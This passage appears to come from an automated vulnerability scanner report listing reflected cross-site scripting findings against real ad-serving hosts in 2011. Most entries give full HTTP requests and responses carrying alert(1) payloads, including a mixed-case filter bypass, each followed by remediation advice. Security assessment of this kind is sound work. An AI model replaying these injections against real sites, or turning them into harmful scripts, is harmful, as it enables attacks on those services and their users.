This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Content-Type: text/javascript
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: TornadoServer/1.2
X-Config-Cache: Miss
X-Request-Time: D=6418 t=1317596563377195
X-Served-By: logger-b010.krxd.net
Content-Length: 90
Date: Sun, 02 Oct 2011 23:02:43 GMT
Connection: close
{"error": "Non existant site for NBCU - nbc.com43357<script>alert(1)</script>fb7066d837f"}
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 325e7<script>alert(1)</script>a9904873cf7 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload be217<ScRiPt>alert(1)</ScRiPt>82ac448e49a was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks, but this can be circumvented by varying the case of the blocked expressions, for example by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload 4036d<ScRiPt>alert(1)</ScRiPt>bbebc658ed7 was submitted in the plc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks, but this can be circumvented by varying the case of the blocked expressions, for example by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 82338<script>alert(1)</script>8a2042977e9 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21a5b"-alert(1)-"cf6c3bde548 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com21a5b"-alert(1)-"cf6c3bde548/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=11B64D8D9D272DE8A43EFE7C4D5C852F; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:27 GMT
Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b25cf"-alert(1)-"a31adad7d99 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736b25cf"-alert(1)-"a31adad7d99/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3D9E116716B31F26EB9E0256A2AECFB4; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:26 GMT
Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdd46"-alert(1)-"c6cd25a3354 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003bdd46"-alert(1)-"c6cd25a3354/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A7A81A0864A745D379F44373497C459F; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:27 GMT
Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3eef7"-alert(1)-"1d88e456200 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003/ca3eef7"-alert(1)-"1d88e456200?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=539BEF821B32F03F7864DA8C43B8EB3C; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:27 GMT
Connection: close
The value of the aid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81099"-alert(1)-"c11bf68dfae was submitted in the aid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp0281099"-alert(1)-"c11bf68dfae&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B9C15A61E5DE496D1856F47CA2AF9D91; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:24 GMT
Connection: close
The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77053"-alert(1)-"66938031c38 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster77053"-alert(1)-"66938031c38&w=160&h=600&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0C9E27AE0A1A8CE55C6C997B4A1CB1CA; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:25 GMT
Connection: close
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54890"-alert(1)-"132ffc34b47 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=7218670554890"-alert(1)-"132ffc34b47&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F76C28019C0B902E488281B56C58A584; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:24 GMT
Connection: close
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1487a"-alert(1)-"7e0b3b23f54 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=6001487a"-alert(1)-"7e0b3b23f54&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FBF5954A26F5D03F6085B2EC13D8F0DF; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:26 GMT
Connection: close
The value of the js request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbc1f"-alert(1)-"4fc8df959c1 was submitted in the js parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10fbc1f"-alert(1)-"4fc8df959c1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FFB5C4265780750837806A89B2B0B812; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:26 GMT
Connection: close
2.48. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://fw.adsafeprotected.com
Path: /rjss/choices.truste.com/10736/9003/ca
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0cbc"-alert(1)-"817e5b6934b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10&f0cbc"-alert(1)-"817e5b6934b=1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:26 GMT
Connection: close
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb9a7"-alert(1)-"910b8bf640d was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01bb9a7"-alert(1)-"910b8bf640d&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0804C1A00E565ECBE0A9E02DA2A4CE2F; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:24 GMT
Connection: close
The value of the plc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f40e3"-alert(1)-"d0ecdf8d0fd was submitted in the plc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tlf40e3"-alert(1)-"d0ecdf8d0fd&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=51394304C5191E0560BE30CA720D99CC; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:25 GMT
Connection: close
The value of the w request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45685"-alert(1)-"e066e44082e was submitted in the w parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=16045685"-alert(1)-"e066e44082e&h=600&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0AD7A3C7C2D8D6EB41AF3CA6593E2046; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:25 GMT
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72461"-alert(1)-"68fd0dd1600 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/dc72461"-alert(1)-"68fd0dd1600/10736/179733/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8A6B259E16FBA90FC9313AAB1BDF8F6A; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:25 GMT
Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e8e4"-alert(1)-"66c74cdde76 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/dc/107361e8e4"-alert(1)-"66c74cdde76/179733/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B49B44617777455C1C06DF0D1A12D42A; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:25 GMT
Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae470"-alert(1)-"6c0de5df76c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/dc/10736/179733ae470"-alert(1)-"6c0de5df76c/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=117F352BB6F22F325C438328E8790655; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:26 GMT
Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd9d6"-alert(1)-"2b09f5fcdaa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/dc/10736/179733/adjfd9d6"-alert(1)-"2b09f5fcdaa/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9F7C04BA304238499B9F7B8E8EBE8D90; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:26 GMT
Connection: close
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd555"-alert(1)-"ab026152e04 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/dc/10736/179733/adj/N5823.8705.MLBbd555"-alert(1)-"ab026152e04/B5918949.10;sz=160x600;ord=6927014? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B14D2E67FEF476D1EC90A153ECC57EEE; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:26 GMT
Connection: close
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50477"-alert(1)-"b76bea173ee was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.1050477"-alert(1)-"b76bea173ee;sz=160x600;ord=6927014? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:26 GMT
Connection: close
2.58. http://fw.adsafeprotected.com/rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7cd1"-alert(1)-"02a8dfc6b5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014?&c7cd1"-alert(1)-"02a8dfc6b5d=1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:25 GMT
Connection: close
